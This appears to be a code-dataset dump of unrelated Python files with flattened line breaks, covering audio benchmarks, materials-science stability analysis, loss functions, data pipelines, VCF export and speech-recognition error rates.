# # Copyright 2022 Picovoice Inc. # # You may not use this file except in compliance with the license. A copy of the license is located in the "LICENSE" # file accompanying this source. # # Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on # an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the # specific language governing permissions and limitations under the License. # import sys import time import unittest from cobra import Cobra from util import * from test_util import * class CobraPerformanceTestCase(unittest.TestCase): ACCESS_KEY = sys.argv[1] NUM_TEST_ITERATIONS = int(sys.argv[2]) PERFORMANCE_THRESHOLD_SEC = float(sys.argv[3]) def test_performance(self): cobra = Cobra(access_key=sys.argv[1], library_path=pv_library_path('../..')) audio = read_wav_file( os.path.join(os.path.dirname(__file__), '../../res/audio/sample.wav'), cobra.sample_rate) num_frames = len(audio) // cobra.frame_length perf_results = [] for i in range(self.NUM_TEST_ITERATIONS): proc_time = 0 for j in range(num_frames): frame = audio[j * cobra.frame_length:(j + 1) * cobra.frame_length] start = time.time() cobra.process(frame) proc_time += time.time() - start if i > 0: perf_results.append(proc_time) cobra.delete() avg_perf = sum(perf_results) / self.NUM_TEST_ITERATIONS print("Average performance: %s" % avg_perf) self.assertLess(avg_perf, self.PERFORMANCE_THRESHOLD_SEC) if __name__ == '__main__': if len(sys.argv) != 4: print("usage: test_cobra_perf.py ${ACCESS_KEY} ${NUM_TEST_INTERVALS} ${PERFORMANCE_THRESHOLD_SEC}") exit(1) unittest.main(argv=sys.argv[:1])
1,947
660
import bittensor from config import Config from metagraph import Metagraph from dendrite import Dendrite from nucleus import Nucleus from neuron import Neuron from Crypto.Hash import SHA256 from datetime import timedelta import grpc from loguru import logger import pickle import numpy as np import random import time from timeloop import Timeloop def set_timed_loops(tl, config, neuron, metagraph): # Test self. # @tl.job(interval=timedelta(seconds=1)) # def test(): # channel = grpc.insecure_channel(config.serve_address + ":" + config.port) # # for _ in range(100): # # Inc message id. # message_id = random.randint(0, 1000000) # # # Make request. # spikes = np.array([['apples']]) # stub = bittensor.proto.bittensor_pb2_grpc.BittensorStub(channel) # # time_str = str(time.time()) # # Build hash. # hash = SHA256.new() # hash.update(config.identity.encode()) # hash.update(spikes.tobytes()) # hash.update(time_str.encode()) # message_hash = hash.digest() # # # Build request. # request = bittensor.proto.bittensor_pb2.SpikeRequest() # request.parent_id = config.identity # request.message_id = message_hash # request.payload = pickle.dumps(spikes, protocol=0) # # # Send Spike. # try: # response = stub.Spike(request) # response = pickle.loads(response.payload).reshape(1, 128) # # except Exception as e: # logger.error(str(e)) # # # Make grad request. # grad = np.zeros((1, 128)) # stub = bittensor.proto.bittensor_pb2_grpc.BittensorStub(channel) # # # Build hash. # hash = SHA256.new() # hash.update(config.identity.encode()) # hash.update(spikes.tobytes()) # hash.update(time_str.encode()) # message_hash = hash.digest() # # request = bittensor.proto.bittensor_pb2.GradeRequest() # request.parent_id = config.identity # request.message_id = message_hash # request.payload = pickle.dumps(grad, protocol=0) # # # Send grade request. # try: # stub.Grade(request) # except Exception as e: # logger.error(str(e)) # Pull the updated graph state (Vertices, Edges, Weights) @tl.job(interval=timedelta(seconds=7)) def pull_metagraph(): metagraph.pull_metagraph() # Reselect channels. @tl.job(interval=timedelta(seconds=10)) def connect(): neuron.connect() # Apply a gradient step. @tl.job(interval=timedelta(seconds=3)) def learn(): neuron.Learn() def main(): config = Config() metagraph = Metagraph(config) dendrite = Dendrite(config, metagraph) nucleus = Nucleus(config) neuron = Neuron(config, dendrite, nucleus, metagraph) neuron.serve() # Start timed calls. tl = Timeloop() set_timed_loops(tl, config, neuron, metagraph) tl.start(block=False) logger.info('Started Timers.') def tear_down(_config, _neuron, _dendrite, _nucleus, _metagraph): logger.debug('tear down.') del _neuron del _dendrite del _nucleus del _metagraph del _config try: logger.info('Begin wait on main...') while True: logger.debug('heartbeat') time.sleep(100) except KeyboardInterrupt: logger.debug('Neuron stopped with keyboard interrupt.') tear_down(config, neuron, dendrite, nucleus, metagraph) except Exception as e: logger.error('Neuron stopped with interrupt on error: ' + str(e)) tear_down(config, neuron, dendrite, nucleus, metagraph) if __name__ == '__main__': logger.debug("started neuron.") main()
4,034
1,327
# MIPLearn: Extensible Framework for Learning-Enhanced Mixed-Integer Optimization # Copyright (C) 2020, UChicago Argonne, LLC. All rights reserved. # Released under the modified BSD license. See COPYING.md for more details. from miplearn import LearningSolver from miplearn.problems.knapsack import KnapsackInstance def get_test_pyomo_instances(): instances = [ KnapsackInstance( weights=[23.0, 26.0, 20.0, 18.0], prices=[505.0, 352.0, 458.0, 220.0], capacity=67.0, ), KnapsackInstance( weights=[25.0, 30.0, 22.0, 18.0], prices=[500.0, 365.0, 420.0, 150.0], capacity=70.0, ), ] models = [instance.to_model() for instance in instances] solver = LearningSolver() for i in range(len(instances)): solver.solve(instances[i], models[i]) return instances, models
897
338
from binascii import unhexlify import threading import time # Serialization utils class PBSerializationHandler: def __init__(self, msg_obj): self._msg_obj = msg_obj def encode_msgs(self, ids, msgs): msg = "<" for id_msg, pb_msg in zip(ids, msgs): msg += str(id_msg) + "|" for byte in bytearray(pb_msg.SerializeToString()): msg += str(hex(byte))[2:].zfill(2) # Remove \x and fill with 0 in front to always takes 2 digits msg += ";" msg += ">" return msg def encode_msg(self, id, msg): return self.encode_msgs([id], [msg]) def deserialize(self, messages): messages = messages.decode("ascii") msg_array = messages[1:-1].split(';') # Remove < > characters and split sub-msgs object_list = [] for msg in msg_array: if len(msg) > 0: msg_id, raw_msg = msg.split("|") # Find the id of the message msg_id = int(msg_id) obj = self._msg_obj[msg_id] obj.ParseFromString(unhexlify(raw_msg)) object_list.append([msg_id, obj]) return object_list # Serial communication utils class ArduinoReadHandler(threading.Thread): def __init__(self, sleeptime, readfunc): self._sleeptime = sleeptime self._readfunc = readfunc threading.Thread.__init__(self) self._runflag = threading.Event() self._runflag.clear() self._run = True def run(self): self._runflag.set() self.worker() def worker(self): while self._run: if self._runflag.is_set(): self._readfunc() time.sleep(self._sleeptime) def pause(self): self._runflag.clear() def resume(self): self._runflag.set() def running(self): return self._runflag.is_set() def kill(self): self._run = False class PBSerialHandler: def __init__(self, serial, callback, msg_obj, sleeptime=0.01): self._serial = serial self._sleeptime = float(sleeptime) self._callback = callback self._interlock = False self._response = None self._serialization_handler = PBSerializationHandler(msg_obj) self._worker = ArduinoReadHandler(self._sleeptime, self.read_callback) self._worker.start() def kill(self): self._worker.kill() def read_callback(self): if not self._interlock: self._interlock = True try: input = self._serial.read() if input == b'<': buffer = self._serial.read_until(b'>') self._serial.flush() self._response = b'<' + buffer self._callback(self._response) except Exception as e: print("Read call back error " + str(e)) self._interlock = False def write_pb_msg(self, id, msg): self.write_pb_msgs([id], [msg]) def write_pb_msgs(self, ids, msgs): encoded_msg = self._serialization_handler.encode_msgs(ids, msgs) while self._interlock: time.sleep(self._sleeptime) self._interlock = True self._serial.write(encoded_msg.encode("ascii")) self._serial.flush() self._interlock = False
3,394
1,033
li = [1, 2, 3, 3, 4, 5, 6] del(li[1]) print(li) del(li) print(li)
68
49
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Thu Apr 4 18:07:03 2019 @author: NickT """ from pymatgen import MPRester import pandas as pd import matplotlib.pyplot as plt import csv import multiprocessing as mp import pickle import tqdm import time mat_api_key = '<ENTER API KEY>' mpr = MPRester(mat_api_key) print("Loading Compounds....") file = open('MPDatabase.pickle', 'rb') all_compounds1 = pickle.load(file) all_compounds = [] for compound in all_compounds1: if compound['nsites'] == sum(compound['unit_cell_formula'].values()): all_compounds.append(compound) criteria = float(input("Enter Stable Phase Criteria in meV: ")) #def find_stable_phases(compound): # ''' # find all compounds with e_above_hull within given range of zero # ''' # if abs(compound['e_above_hull']) < criteria/1000: # return compound print('Finding Stable Phases....') stable_phase = [] for compound in tqdm.tqdm(all_compounds): #find all compounds with e_above_hull within 0.05 of 0 if abs(compound['e_above_hull']) < criteria/1000: stable_phase.append(compound) #pool = mp.Pool(processes=1) # #stable_phase = list(tqdm.tqdm(pool.imap(find_stable_phases, all_compounds), total=86680)) ######## COMPETING PHASE AND OXIDE CALCULATION ######## def find_comp(stable_oxides, compound_unit_cell, compound_formE, condition): ''' Finds complementary oxide or competing phases group and associated total heat of oxidation args: stable_oxides = list of dictionaries of stable oxides or competing phases with lower formation energy than original material compound_unit_cell = dict of elements in unit cell of original compound ompound_formE = formation energy of original compound condition = string dictating whether it is for comp oxide or comp competing phases output: tuple: (list of dicitionatries of predicted materials, combined formation energy of these materials (with appropriate ratios), whether this combined formE is lower than that of original material (boolean)) notes: intersect_rank: used to find limiting element by finding ratio of normalised stochiometry between original material and oxide ''' result = [] FinishEarly = False #what if positive formE orig_natoms = sum(compound_unit_cell.values()) compound_unit_cell1 = dict((a, b/orig_natoms) for a, b in compound_unit_cell.items()) #normalise stoichiometry for oxide in stable_oxides: oxide['el_weight'] = dict((a, b/oxide['nsites']) for a, b in oxide['unit_cell_formula'].items()) #normalise stoichiometry if condition == 'Oxide': del oxide['el_weight']['O'] oxide['ranker'] = dict((a, b/compound_unit_cell1[a]) for a, b in oxide['el_weight'].items()) #find greedy ranking parameter oxide['ranking_no'] = sum(oxide['ranker'].values()) sort_oxides = sorted(stable_oxides, key = lambda oxide: (oxide['formation_energy_per_atom']/oxide['ranking_no'])) sort_oxides1 = sort_oxides[:] total_formE = 0 while sum(compound_unit_cell1.values()) != 0 and sort_oxides1 != []: #if all atoms in unit cell not yet accounted for oxide = sort_oxides1[0] intersection = list(set(oxide['elements']).intersection(compound_unit_cell1.keys())) if intersection == []: print(compound_unit_cell) print(oxide['unit_cell_formula']) print(oxide['nsites']) intersect_rank = {} for element in intersection: intersect_rank[element] = compound_unit_cell1[element]/ oxide['el_weight'][element] limiting_element = min(intersect_rank, key=intersect_rank.get) #find limiting element ratio = intersect_rank[limiting_element] #(value) used_up_elements = [] for element in intersection: compound_unit_cell1[element] = compound_unit_cell1[element] - (ratio * oxide['el_weight'][element]) if abs(compound_unit_cell1[element]) < 0.0001: #inequality because of != 0 problem used_up_elements.append(element) result.append(oxide) sort_oxides1.remove(oxide) total_formE += oxide['formation_energy_per_atom']*ratio sort_oxides1 = [oxide for oxide in sort_oxides1 if len(set(oxide['elements']).intersection(used_up_elements)) == 0] #remove oxides in list which arent useful (dont have new elements) if sort_oxides1 == [] and abs(sum(compound_unit_cell1.values())) > 0.0001: #inequality because of != 0 problem print(compound_unit_cell1) FinishEarly = True return (result, total_formE, total_formE-compound_formE, len(result), FinishEarly) #### FOR TESTING FIND_OXIDES ABCO4 = {'elements': ['A', 'B', 'C', 'O'], 'formation_energy_per_atom': -750, 'nsites':7, 'unit_cell_formula':{'A':1, 'B':1, 'C':1, 'O':4}} AO = {'elements': ['A', 'O'], 'formation_energy_per_atom': -100, 'nsites':8, 'unit_cell_formula':{'A':4, 'O':4}} BO2 = {'elements': ['B', 'O'], 'formation_energy_per_atom': -100, 'nsites':6, 'unit_cell_formula':{'B':2, 'O':4}} C2O = {'elements': ['C', 'O'], 'formation_energy_per_atom': -300, 'nsites':24, 'unit_cell_formula':{'C':16, 'O':8}} A2BO6 = {'elements': ['A', 'B', 'O'], 'formation_energy_per_atom': -380, 'nsites':9, 'unit_cell_formula':{'A':2, 'B':1, 'O':6}} A2CO4 = {'elements': ['A', 'C', 'O'], 'formation_energy_per_atom': -620, 'nsites':63, 'unit_cell_formula':{'A':18, 'C':9, 'O':36}} original = {'A':4, 'B':8, 'C':10} listt = [ABCO4, AO, BO2, C2O, A2BO6, A2CO4] find_comp(listt, original, -400, 'Oxide') #### def Make_Property_Dict(compound): ''' Function to be iterated over all compounds. ''' PDict = {} global stable_phase if abs(compound['e_above_hull']) < criteria/1000: #if stable #### FOR NUM PHASES competing_phases_id_withform1 = [] competing_phase_no1 = 0 comp_listdict =[] #### FOR NUM OXIDES v_ratio2 = 0 oxide_no1 = 0 oxides_id_withform1 = [] v_ratio_id2 = 'n/a' oxide_listdict = [] elements = compound['elements'] for i in stable_phase: #### FOR NUM PHASES if set(i['elements']).issubset(elements): comp_listdict.append(i) #for find_comp if i['formation_energy_per_atom'] < compound['formation_energy_per_atom']: #find all other phases containing just those elements competing_phase_no1 +=1 competing_phases_id_withform1.append(i['task_id']) #### FOR NUM OXIDES if 'O' in i['elements']: el = i['elements'][:] el.remove('O') O = i['unit_cell_formula']['O'] if set(el).issubset(elements) and O != i['nsites']: oxide_listdict.append(i) #for find_comp if i['formation_energy_per_atom'] < compound['formation_energy_per_atom']: oxide_no1 += 1 oxides_id_withform1.append(i['task_id']) #### FOR NUM PHASES PDict['task_id'] = compound['task_id'] PDict['Formula'] = compound['pretty_formula'] PDict['Bandgap /eV'] = compound['band_gap'] PDict['Competing Phase Number (with formation E correction)'] = competing_phase_no1 PDict['Competing Phase List (with formation E correction)'] = competing_phases_id_withform1 y = find_comp(comp_listdict, compound['unit_cell_formula'], compound['formation_energy_per_atom'], 'NotOx') PDict['Complementary Competing Phase List'] = y[0] PDict['Complementary Heat of Decomposition'] = y[1] PDict['Lower Formation Energy Than Original Material'] = y[2] PDict['Number of Complementary Phases'] = y[3] PDict['Early Finish1'] = y[4] #### FOR NUM OXIDES PDict['Number of Oxides (with formation E correction)'] = oxide_no1 PDict['Oxide List (with formation E correction)'] = oxides_id_withform1 x = find_comp(oxide_listdict, compound['unit_cell_formula'], compound['formation_energy_per_atom'], 'Oxide') PDict['Complementary Oxide List'] = x[0] PDict['Complementary Heat of Oxidation'] = x[1] PDict['Lower Formation Energy Than Original Material'] = x[2] PDict['Number of Complementary Oxides'] = x[3] PDict['Early Finish2'] = x[4] v_ratio2 = 1000 for i in x[0]: v2 = i['volume']/compound['volume'] if abs(v2 - 1) < abs(v_ratio2 - 1): v_ratio2 = v2 v_ratio_id2 = i PDict['Best Volume Ratio'] = v_ratio_id2 PDict['ID of Best Volume Ratio'] = v_ratio2 return PDict if __name__ == '__main__': pool = mp.Pool(processes=16) print('Calculating Data....') DictList = list(tqdm.tqdm(pool.imap(Make_Property_Dict, all_compounds), total=len(all_compounds))) FinalDF = pd.DataFrame(DictList) filename = 'FinalDF_' + str(criteria) + '.pckl' f = open(filename, 'wb') pickle.dump(FinalDF, f) f.close() print('Done.')
9,769
3,246
import numpy as np from layers.activation_layer import * from layers.gradient_check import * def mean_square_error_loss(y_hat, y): """ MSE loss, loss=mean(y_hat-y)^2 :param y_hat: output of the network :param y: input labels :return: MSE loss """ loss = np.mean((y_hat - y) ** 2) num_output = y.shape[1] d_loss = 2 * (y_hat - y) / num_output return loss, d_loss def cross_entropy_loss(y_hat, y): """ Cross entropy loss, loss = -sum(yi * log(y_hat)) :param y_hat: output of the network :param y: input labels (one_hot) :return: cross entropy loss """ loss = -np.sum(y * np.log(y_hat), axis=1) # loss = np.mean(loss, axis=0) d_loss = -y / y_hat return loss, d_loss def softmax_loss(x, y): shifted_logits = x - np.max(x, axis=1, keepdims=True) Z = np.sum(np.exp(shifted_logits), axis=1, keepdims=True) log_probs = shifted_logits - np.log(Z) probs = np.exp(log_probs) N = x.shape[0] loss = -np.sum(log_probs[np.arange(N), y]) / N dx = probs.copy() dx[np.arange(N), y] -= 1 dx /= N return loss, dx if __name__ == '__main__': np.random.seed(231) num_classes, num_inputs = 10, 50 x = 0.001 * np.random.randn(num_inputs, num_classes) y = np.random.randint(num_classes, size=num_inputs) dx_num = eval_numerical_gradient(lambda x: softmax_loss(x, y)[0], x, verbose=False) loss, dx = softmax_loss(x, y) # Test softmax_loss function. Loss should be 2.3 and dx error should be 1e-8 print('\nTesting softmax_loss:') print('loss: ', loss) print('dx error: ', rel_error(dx_num, dx))
1,638
668
from datapackage_pipelines.wrapper import ingest, spew from datapackage_pipelines.utilities.resources import PROP_STREAMING from bs4 import BeautifulSoup parameters, datapackage, resources = ingest() def get_resource(): for resource in resources: for row in resource: if row["collection"] == parameters["collection-name"] and row["display_allowed"]: doc = row["parsed_doc"] item = {"doc_id": "clearmash_{}".format(row["id"]), "source": "clearmash", "collection": parameters["collection-name"], "title_he": doc.get("entity_name", {}).get("he", ""), "title_en": doc.get("entity_name", {}).get("en", ""), "content_html_he": doc.get("_c6_beit_hatfutsot_bh_base_template_description", {}).get("he", ""), "content_html_en": doc.get("_c6_beit_hatfutsot_bh_base_template_description", {}).get("en", "")} item.update(content_text_he=' '.join(BeautifulSoup(item["content_html_he"], "lxml").findAll(text=True)), content_text_en=' '.join(BeautifulSoup(item["content_html_en"], "lxml").findAll(text=True))) yield item datapackage["resources"] = [{PROP_STREAMING: True, "name": parameters["resource-name"], "path": "{}.csv".format(parameters["resource-name"]), "schema": {"fields": [{'name': 'doc_id', 'type': 'string', 'es:index': False}, {"name": "source", "type": "string", "es:index": False}, {"name": "collection", "type": "string", "es:index": False}, {"name": "title_he", "type": "string"}, {"name": "title_en", "type": "string"}, {"name": "content_html_he", "type": "string", "es:index": False}, {"name": "content_html_en", "type": "string", "es:index": False}, {"name": "content_text_he", "type": "string"}, {"name": "content_text_en", "type": "string"},], "primaryKey": ["doc_id"]}}] spew(datapackage, [get_resource()])
2,518
672
# Databricks notebook source # MAGIC %md # MAGIC References # MAGIC # MAGIC https://spark.apache.org/docs/latest/api/python/pyspark.sql.html#pyspark.sql.DataFrameStatFunctions<br> # MAGIC https://docs.azuredatabricks.net/user-guide/visualizations/index.html<br> # COMMAND ---------- # MAGIC %md # MAGIC #### Get a dataframe for notebook tasks # COMMAND ---------- # MAGIC %run ./adb_3_ingest_to_df # COMMAND ---------- # MAGIC %md # MAGIC ### Data exploration # COMMAND ---------- df_flights_full.printSchema() # COMMAND ---------- df_flights_full.count() # COMMAND ---------- # See if there are duplicate rows - if so, this will differ from just count() df_flights_full.distinct().count() # COMMAND ---------- # How many duplicates? df_flights_full.count() - df_flights_full.dropDuplicates().count() # COMMAND ---------- # How many duplicates and missing values? df_flights_full.count() - df_flights_full.dropDuplicates().dropna(how="any", subset=["DepDelay", "ArrDelay"]).count() # COMMAND ---------- # Summary statistics display(df_flights_full.describe()) # COMMAND ---------- # Descriptive stats may not make sense for all columns in the df, so let's just get desc stats for a subset display(df_flights_full.describe().select("summary", "DepDelay", "ArrDelay")) # COMMAND ---------- # Get top rows - head(n) or take(n) display(df_flights_full.head(5)) # COMMAND ---------- df_flights_full.show(Truncate=False) # COMMAND ---------- # limit(n), head(n), take(n) display(df_flights_full.head(7)) # COMMAND ---------- df_flights_full.explain() # COMMAND ---------- # MAGIC %md # MAGIC #### Stats # COMMAND ---------- df_flights_full.approxQuantile("ArrDelay", [0.25, 0.5, 0.75], 0.1) # COMMAND ---------- display(df_flights_full.freqItems(["DestAirportID"])) # COMMAND ---------- # Check correlation between two fields df_flights_full.corr("DepDelay", "ArrDelay") # COMMAND ---------- display(df_flights_full.select("DepDelay", "ArrDelay")) # COMMAND ----------
2,011
772
from .convert import convert, simplify_and_convert
50
12
""" Takes an input MT, and extracts a VCF-format representation. This is currently required as the end-to-end CPG pipeline doesn't currently store intermediate files. To simulate workflows running on VCF files, we have to regenerate a VCF representation from a MT. Optional argument allows the specification of an 'additional header' file When Hail extracts a VCF from a MT, it doesn't contain any custom field definitions, e.g. 'VQSR' as a Filter field. This argument allows us to specify additional lines which are required to make the final output valid within the VCF specification """ from typing import Optional from argparse import ArgumentParser import hail as hl from cpg_utils.hail_batch import init_batch def main(input_mt: str, output_path: str, additional_header: Optional[str] = None): """ takes an input MT, and reads it out as a VCF :param input_mt: :param output_path: :param additional_header: file containing lines to append to header :return: """ init_batch() matrix = hl.read_matrix_table(input_mt) hl.export_vcf( matrix, output_path, append_to_header=additional_header, tabix=True, ) if __name__ == '__main__': parser = ArgumentParser() parser.add_argument( '--input', type=str, help='input MatrixTable path', ) parser.add_argument('--output', type=str, help='path to write VCF out to') parser.add_argument( '--additional_header', type=str, help='path to file containing any additional header lines', required=False, default=None, ) args = parser.parse_args() main( input_mt=args.input, output_path=args.output, additional_header=args.additional_header, )
1,788
525
#!/usr/bin/env python """ Python function for computing word error rates metric for Automatic Speech Recognition files """ import argparse import re import editdistance from asrtoolkit.clean_formatting import clean_up from asrtoolkit.data_structures.time_aligned_text import time_aligned_text from asrtoolkit.file_utils.script_input_validation import assign_if_valid # defines global regex for tagged noises and silence re_tagged_nonspeech = re.compile(r"[\[<][A-Za-z #]*[\]>]") # defines global regex to remove these nsns nonsilence_noises = [ "noise", "um", "ah", "er", "umm", "uh", "mm", "mn", "mhm", "mnh", "huh", "hmm", ] re_nonsilence_noises = re.compile(r"\b({})\b".format( "|".join(nonsilence_noises))) def remove_nonsilence_noises(input_text): """ Removes nonsilence noises from a transcript """ return re.sub(re_nonsilence_noises, "", input_text) def wer(ref, hyp, remove_nsns=False): """ Calculate word error rate between two string or time_aligned_text objects >>> wer("this is a cat", "this is a dog") 25.0 """ # accept time_aligned_text objects too if type(ref) == time_aligned_text: ref = ref.text() if type(hyp) == time_aligned_text: hyp = hyp.text() # remove tagged noises and other nonspeech events ref = re.sub(re_tagged_nonspeech, " ", ref) hyp = re.sub(re_tagged_nonspeech, " ", hyp) # optionally, remove non silence noises if remove_nsns: ref = remove_nonsilence_noises(ref) hyp = remove_nonsilence_noises(hyp) # clean punctuation, etc. ref = clean_up(ref) hyp = clean_up(hyp) # calculate WER return (100 * editdistance.eval(ref.split(" "), hyp.split(" ")) / max(1, len(ref.split(" ")))) def cer(ref, hyp, remove_nsns=False): """ Calculate character error rate between two strings or time_aligned_text objects >>> cer("this cat", "this bad") 25.0 """ # accept time_aligned_text objects too if type(ref) == time_aligned_text: ref = ref.text() if type(hyp) == time_aligned_text: hyp = hyp.text() if remove_nsns: ref = remove_nonsilence_noises(ref) hyp = remove_nonsilence_noises(hyp) ref = clean_up(ref) hyp = clean_up(hyp) # calculate per line CER return 100 * editdistance.eval(ref, hyp) / max(1, len(ref)) def main(): parser = argparse.ArgumentParser( description= "Compares a reference and transcript file and calculates word error rate (WER) between these two files" ) parser.add_argument( "reference_file", metavar="reference_file", type=str, help='reference "truth" file', ) parser.add_argument( "transcript_file", metavar="transcript_file", type=str, help="transcript possibly containing errors", ) parser.add_argument( "--char-level", help="calculate character error rate instead of word error rate", action="store_true", ) parser.add_argument( "--ignore-nsns", help="ignore non silence noises like um, uh, etc.", action="store_true", ) # parse arguments args = parser.parse_args() # read files from arguments ref = assign_if_valid(args.reference_file) hyp = assign_if_valid(args.transcript_file) if ref is None or hyp is None: print( "Error with an input file. Please check all files exist and are accepted by ASRToolkit" ) elif args.char_level: print("CER: {:5.3f}%".format(cer(ref, hyp, args.ignore_nsns))) else: print("WER: {:5.3f}%".format(wer(ref, hyp, args.ignore_nsns))) if __name__ == "__main__": main()
3,787
1,284